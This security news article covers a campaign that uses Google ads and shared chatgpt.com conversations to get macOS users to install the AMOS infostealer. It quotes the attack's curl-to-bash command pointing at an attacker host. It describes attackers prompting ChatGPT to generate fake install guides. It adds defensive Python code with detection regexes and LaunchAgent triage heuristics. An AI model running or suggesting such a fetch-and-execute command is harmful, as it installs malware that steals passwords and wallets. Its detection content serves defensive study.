A new macOS malware campaign is exploiting the official ChatGPT website to distribute an infostealer known as AMOS. Attackers are leveraging a technique dubbed “ClickFix” to spread the malicious software by posting fake installation guides on the legitimate chatgpt.com domain. This sophisticated attack highlights how threat actors can manipulate popular platforms to reach unsuspecting users.
The campaign hinges on ChatGPT’s chat-sharing feature, which allows users to create and share public conversations as links that appear to originate from OpenAI. This illusion of legitimacy allows attackers to trick macOS users, who are searching for ways to enhance their ChatGPT experience or find related tools, into downloading malware.
New ClickFix Attacks Target macOS Users via Official ChatGPT Website
The attack commences with strategically placed paid advertisements on Google, targeting searches related to “chatgpt atlas.” These sponsored links are designed to mimic legitimate search results, leading users to what appears to be the official ChatGPT domain. The ad itself displays a compelling title, “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac,” further bolstering its apparent trustworthiness.
Upon clicking these deceptive ads, users are directed to a shared ChatGPT conversation hosted under the chatgpt.com/share/ path. This shared chat allegedly contains installation instructions for a non-existent browser named Atlas. Kaspersky security researchers have identified that the malicious actors employed prompt engineering to guide ChatGPT in generating these convincing, yet fabricated, installation guides. The attackers then meticulously cleaned the chat history to remove any potentially suspicious content before making the conversation public.
The use of the chatgpt.com/share/ path is a critical element of the social engineering aspect of this campaign. Many users may not recognize that this is simply a shared conversation and could mistakenly believe it to be official content or a legitimate tool provided by OpenAI. This perceived authority makes them more likely to follow the embedded instructions.
The Infection Mechanism for the AMOS Infostealer
The fake installation guide provided within the shared ChatGPT conversation instructs macOS users to open their Terminal application and execute a specific command. This command, which reportedly reads `/bin/bash -c "$(curl -fsSL 'https://atlas-extension.com/gt')"`, instructs the system to download a malicious script from an attacker-controlled server hosted at atlas-extension.com and execute it immediately. This process bypasses standard security checks by directly fetching and running code.
Once executed, the downloaded script prompts the user for their system password. It will repeatedly request the password until the correct credentials are provided. Upon successfully obtaining the system password, the script proceeds to download and install the AMOS infostealer. The stolen credentials are then used to facilitate the malware’s installation and operation.
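The infection step described above has a recognisable shape on the endpoint: a shell launched from Terminal whose command line fetches a remote script and executes it in one step. The following detection logic is an added example written for this article, not code from Kaspersky or from the campaign; it runs two hunting rules over a constructed set of process-execution events (the first event reproduces the command quoted on this page, the other URLs and usernames are made up). The second rule generalises beyond this campaign to the plain `curl ... | sh` variant of the same pattern.

```python
import re

# Constructed sample of process-execution events, shaped loosely like what an
# EDR or unified-log collector would emit. These are not real telemetry; only
# the first command line is the one reported on this page.
SAMPLE_EVENTS = [
    {"ts": "2025-11-20T14:02:11Z", "user": "alice", "parent": "Terminal",
     "cmdline": "/bin/bash -c \"$(curl -fsSL 'https://atlas-extension.com/gt')\""},
    {"ts": "2025-11-20T14:05:40Z", "user": "bob", "parent": "Terminal",
     "cmdline": "curl -fsSL https://example.invalid/install.sh | sh"},
    {"ts": "2025-11-20T14:07:02Z", "user": "carol", "parent": "Terminal",
     "cmdline": "curl -O https://example.invalid/report.pdf"},
    {"ts": "2025-11-20T14:09:55Z", "user": "dave", "parent": "Terminal",
     "cmdline": "brew install wget"},
]

RULES = {
    # sh/bash/zsh -c "$(curl ...)": the exact shape of the ClickFix command
    # quoted in this article (command substitution feeds the fetched script
    # straight to the interpreter).
    "shell_c_with_curl_substitution": re.compile(
        r"(?:^|[\s/])(?:bash|sh|zsh)\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
    # curl/wget ... | sh: the pipe-to-shell variant of the same technique.
    "curl_piped_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:/bin/)?(?:bash|sh|zsh)\b"),
}


def classify(cmdline: str) -> list:
    """Return the names of every rule the command line matches (empty if none)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def extract_urls(cmdline: str) -> list:
    """Pull remote URLs out of a command line so an analyst can pivot on them."""
    return re.findall(r"https?://[^\s'\"|)]+", cmdline)


def scan(events) -> list:
    """Run every rule over a list of events; return one hit record per match."""
    hits = []
    for ev in events:
        matched = classify(ev["cmdline"])
        if matched:
            hits.append({
                "ts": ev["ts"],
                "user": ev["user"],
                "parent": ev["parent"],
                "rules": matched,
                "urls": extract_urls(ev["cmdline"]),
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['ts']} user={hit['user']} parent={hit['parent']} "
              f"rules={hit['rules']} urls={hit['urls']}")
```

Both rules key on the structure of the command rather than on the attacker's domain, so they keep matching when the campaign rotates infrastructure; the extracted URL is what you then cross-reference against threat intelligence. A plain `curl -O` download, as in the third sample event, is deliberately not flagged.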
Capabilities of the AMOS Infostealer
The AMOS infostealer is designed to exfiltrate sensitive information from infected macOS systems. According to security analyses, it is capable of stealing passwords, cookies, and other browser data from popular web browsers such as Chrome and Firefox. Furthermore, AMOS specifically targets cryptocurrency wallet information from wallets like Electrum, Coinomi, and Exodus, posing a significant financial threat to users.
Beyond browser and cryptocurrency data, the malware has the ability to collect files with common extensions such as TXT, PDF, and DOCX from frequently accessed user folders, including Desktop, Documents, and Downloads. To ensure persistent access, it also installs a backdoor that automatically starts with the system. This backdoor grants attackers continuous remote access to the compromised system, allowing them to operate undetected and potentially deploy further malicious payloads.
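The article says the backdoor "automatically starts with the system" without naming the mechanism; on macOS, per-user LaunchAgents are one of the standard autostart paths, so triaging them is a natural response step. The script below is an added example written for this article, not code from Kaspersky or from the malware analysis, and it assumes nothing about how AMOS itself persists: it parses two constructed LaunchAgent plists (one benign, one modelled on common red flags) and reports heuristic findings. The `triage_directory` helper can be pointed at a real `~/Library/LaunchAgents` folder.

```python
import os
import plistlib

# Paths a legitimate launch agent rarely executes from; hidden directories
# ("/.") are treated the same way. Heuristic, not a definitive indicator.
SUSPICIOUS_PATH_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# Tokens that mean the agent fetches or evaluates code at start-up rather than
# running a fixed binary. "sh -c" also matches "bash -c" and "zsh -c".
SUSPICIOUS_ARG_TOKENS = ("curl", "wget", "sh -c", "base64", "osascript")

# Constructed sample plists; neither is a real artefact from this campaign.
SAMPLE_PLISTS = {
    "com.apple.updater.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.updater.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>/Users/Shared/.helper/agent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "com.example.backup.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/backup</string><string>--nightly</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}


def _program_and_args(plist: dict):
    """Resolve what the agent runs: Program, or the first ProgramArguments entry."""
    args = [str(a) for a in (plist.get("ProgramArguments") or [])]
    prog = str(plist.get("Program") or (args[0] if args else ""))
    return prog, args


def triage_plist(filename: str, data: bytes) -> list:
    """Return a list of human-readable findings for one LaunchAgent plist."""
    plist = plistlib.loads(data)
    findings = []
    label = str(plist.get("Label", ""))
    prog, args = _program_and_args(plist)

    # Apple's own agents live under /System and /Library; a com.apple.* label in a
    # user's LaunchAgents folder is a common masquerading trick.
    if label.startswith("com.apple."):
        findings.append(f"apple-like label in a user LaunchAgent: {label}")

    for item in [prog] + args:
        if item.startswith(SUSPICIOUS_PATH_PREFIXES) or "/." in item:
            findings.append(f"suspicious path: {item}")
            break

    joined = " ".join(args)
    for token in SUSPICIOUS_ARG_TOKENS:
        if token in joined:
            findings.append(f"fetch/exec token in arguments: {token}")

    # Autostart on its own is normal; it only matters alongside another finding.
    if plist.get("RunAtLoad") and findings:
        findings.append("starts automatically at login (RunAtLoad)")
    return findings


def triage_all(plists: dict) -> dict:
    """Triage a {filename: plist_bytes} mapping; keep only entries with findings."""
    results = {name: triage_plist(name, data) for name, data in plists.items()}
    return {name: f for name, f in results.items() if f}


def triage_directory(path: str) -> dict:
    """Load every .plist in a real LaunchAgents folder and triage it."""
    plists = {}
    for name in os.listdir(path):
        if name.endswith(".plist"):
            with open(os.path.join(path, name), "rb") as fh:
                plists[name] = fh.read()
    return triage_all(plists)


if __name__ == "__main__":
    for name, findings in triage_all(SAMPLE_PLISTS).items():
        print(name)
        for line in findings:
            print("  -", line)
```

Findings are heuristics to prioritise an analyst's attention, not verdicts; a flagged agent should be confirmed by inspecting the program it points at and its code signature before removal.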
The ongoing development of such sophisticated attack vectors, which exploit the trust users place in popular AI platforms and their associated domains, necessitates heightened vigilance from cybersecurity professionals and end-users alike. As threat actors continue to innovate, the focus on robust endpoint security and user education remains paramount in mitigating the risks posed by emerging malware campaigns like this one targeting macOS users.